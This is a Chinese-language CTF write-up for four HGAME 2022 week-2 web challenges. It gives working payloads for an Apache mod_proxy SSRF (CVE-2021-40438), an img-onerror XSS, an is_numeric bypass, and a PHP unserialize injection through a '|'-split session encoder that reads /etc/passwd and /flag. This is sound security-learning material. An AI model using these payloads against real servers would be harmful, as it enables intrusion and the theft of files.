HGAME-week2-web-wp
hgame第二周總結
1.webpack-engine
我不懂,但是真的剛打開就出來了,一臉懵逼(wp說是sourcemap沒關
hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}
2.Apache!
CVE-2021-40438復現,ssrf攻擊
先搭一個環境
然後進入反代理的頁面
然後bp發包
上面這個不對,502,503什麼的錯誤
2021 年 Apache 的 mod_proxy 模組報了個 SSRF 漏洞(CVE-2021-40438),利用這個漏洞直接訪問 //internal.host/flag 即可拿到 flag 。
唯一不同是,網上的 exp 大多是 Apache 直接作為代理伺服器的情況,這題給了 Apache 的配置文件 https-vhosts.conf, ‘/’ 提供靜態資源服務, ‘/proxy’ 提供代理服務。
payload (在漏洞環境下)
/proxy?unix:a{5000}|//internal.host/flag
最終hgame{COng@tul4ti0n~u_r3prOduced_CVE-2021-40438}
3.[At0m的留言板]
找到調試器里的小提示
auth0r使用let,flag使用var(因為使用 var 可以利用 Object.keys(window)拿到全局變數 flag 的變數名,而使用let的話無法獲取。
控制台驗證+觀察得知留言板的內容是類名元素為content來顯示的
先顯示出所有全局變數
document.getElementsByClassName('content')[0].innerText = Object.keys(window)
這裡試了一下flag,發現不行,可能是flag的名字變形了,這裡已經沒有出路,試試那個公眾號吧。
公眾號的主要功能是將用戶輸入的文本在網站中以留言框的形式展現出來,說明可以執行js程式碼,那就將所有變數提取到文本區
先試一試是不是xss,還真是
然後使用如下語句(img是網頁的影像標籤,src屬性是文件路徑,onerror相當於用js事件控制,所以在各個瀏覽器都能兼容
<img src=1 onerror="document.getElementsByClassName('content')[0].innerText = Object.keys(window)">
確定變數名F149_is_Here,拿到flag
方法二:
Object.values(window)直接讀取這些全局變數的內容
方法三:
由於flag定義在了一個script標籤里,直接可以document.scripts讀出裡面內容
4.一本單詞書
有內容轉載三篇部落格(最終payload可以有很多種
//ethe448.github.io/2022/01/21/HGAME2022-wp/#toc-heading-21
//www.pdsdt.lovepdsdt.com/index.php/2022/02/04/hgame2022-week2/
//mochu.blog.csdn.net/article/details/122631962?spm=1001.2014.3001.5502
hint提示www.zip
打開看源碼
首先查看最有可能存在命令執行的文件ping.php
沒有,再查看admin_check.php,沒有,那就login.php
顯然,不允許數據的值為純數字,所以我們要對is_numeric()進行繞過
百度了一下發現該函數可以通過十六進位繞過或者%00進行繞過,這裡使用%20(即1080後面加空格進行繞過
username=adm1n
password=1080
就可以登錄
如果跳轉出現警告,貼一下其他大佬的做法
根據index.php,大致邏輯就是將輸入的傳入get.php和save.php進行處理
頁面的數據處理在get.php和save.php
save.php
<?php
session_start();
include 'admin_check.php';
function encode($data): string {
$result = '';
foreach ($data as $k => $v) {
$result .= $k . '|' . serialize($v);
}
return $result;
}
function saveSessionData() {
$filename = "/tmp/".$_SESSION['unique_key'].'.session';
$data = json_decode(file_get_contents("php://input"));
$str = encode($data);
file_put_contents($filename, $str, FILE_APPEND);
}
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
saveSessionData();
} else {
echo 'method not allowed';
}
將傳入的單詞的key和value寫入文件中,並利用|來將key和value的序列化之後的值分隔。
encode函數比較直觀,是對我們的數據進行序列化存儲,saveSessionData主要是獲取數據同時調用encode函數將數據存儲到指定位置,該文件是由登陸時產生的key進行命名的,調試一下經過encode傳輸的數據,數據將我們value進行序列化存儲了
get.php
<?php
session_start();
include 'admin_check.php';
include 'evil.php';
// flag is in /flag
function decode(string $data): Array {
$result = [];
$offset = 0;
$length = \strlen($data);
while ($offset < $length) {
if (!strstr(substr($data, $offset), '|')) {
return [];
}
$pos = strpos($data, '|', $offset);
$num = $pos - $offset;
$varname = substr($data, $offset, $num);
$offset += $num + 1;
$dataItem = unserialize(substr($data, $offset));
$result[$varname] = $dataItem;
$offset += \strlen(serialize($dataItem));
}
return $result;
}
function loadSessionData(): Array {
$filename = '/tmp/'.$_SESSION['unique_key'].'.session';
if (file_exists($filename)) {
$str = file_get_contents($filename);
return decode($str);
} else {
file_put_contents($filename, '');
return [];
}
}
echo json_encode(loadSessionData());
首先文件告訴了我們flag位置,其次分析兩個function,decode函數主要是對傳入的數據進行反序列化輸出,與剛才save.php中的encode函數互相對應,可以看到encode函數是通過「|」分割key和value的,而decode函數則是通過「|」來進行數據判斷,對「|」後來的數據進行反序列化操作。這裡就存在一個問題,我們可以通過傳輸數據中添加「|」以此來利用decode函數的反序列化進行執行,同時查看evil.php發現了獲取flag的點
看一下evil.php
看見wakeup方法,再聯繫get.php時的unserialize可以猜測這裡是要利用反序列化讓file=/flag然後令flag變數的值變為flag再利用get.php將其讀出來
這裡要注意序列化的內容要在填在單詞的位置,將其作為數組的key而不是value,否則在encode函數時會對value再進行一次序列化導致payload改變,無法執行反序列化操作
還要在反序列化的payload前添加|符號
讓|後的部分執行decode函數中的反序列化
將evil類中的file賦值為/flag,從而讓flag=/flag文件中的內容
這裡的if過濾沒啥用
最終paload:
{|O:4:"Evil":2:{s:4:"file";s:4:"flag";s:4:"flag";N;}
方法二:evil裡面存在file_get_contents,至此我們可以利用evil.php生成payload,再通過get.php進行觸發,構造payload,嘗試讀取文件
<?php
class Evil {
public $file="/etc/passwd";
public $flag="flag{}";
}
$data=new Evil();
echo serialize($data);
//O:4:"Evil":2:{s:4:"file";s:11:"/etc/passwd";s:4:"flag";s:6:"flag{}";}
在傳輸數據時要注意,如果payload寫在value處,會在save.php中被序列化掉,所以要將payload寫入key處
{"1|O:4:\"Evil\":2:{s:4:\"file\";s:11:\"/etc/passwd\";s:4:\"flag\";s:6:\"flag{}\";}":"123"}
訪問get.php
成功獲取到數據,此時修改讀取文件為/flag即可獲取到數據
{"1|O:4:\"Evil\":2:{s:4:\"file\";s:5:\"/flag\";s:4:\"flag\";s:6:\"flag{}\";}":"123"}
三、
官方wp:這題的核心在於 encode 和 decode 兩個函數,這兩個函數取自 imiphp 框架(鏈接),和 Session 持久化有關。
encode 函數將鍵值型數據編碼為 鍵|serialize(值) 的形式,如
{“a”: “1”,”b”: “s”} 編碼為 a|s:1:”1″;b|s:1:”s”。
decode 函數會調用 unserialize 函數將編碼後的數據恢復,具體來說就是 | 後面到下一個鍵名之間的內容換被傳遞給 unserialize 函數。
當鍵中包含 | 符號時,就可以注入任意的反序列化後的數據。
比如 {“a|s:2:”22″;b”:”2″} 這樣的數據, “a|s:2:”22″;b” 做為鍵,數據經過 encode 函數之後變為 a|s:2:”22″;b|s:1:”2″,decode 解碼後得到的對象為 {“a”:”22″,”b”:”2″}。
通過這樣的方式就可以反序列化任意類了,將 Evil 類的 file 屬性設置為 /flag即可。
官方payload:{“a|O:4:”Evil”:2:{s:4:”file”;s:5:”/flag”;s:4:”flag”;N;};b”:2}
下面是另一種payload:name|O:4:”Evil”:1:{s:4:”file”;s:5:”/flag”;}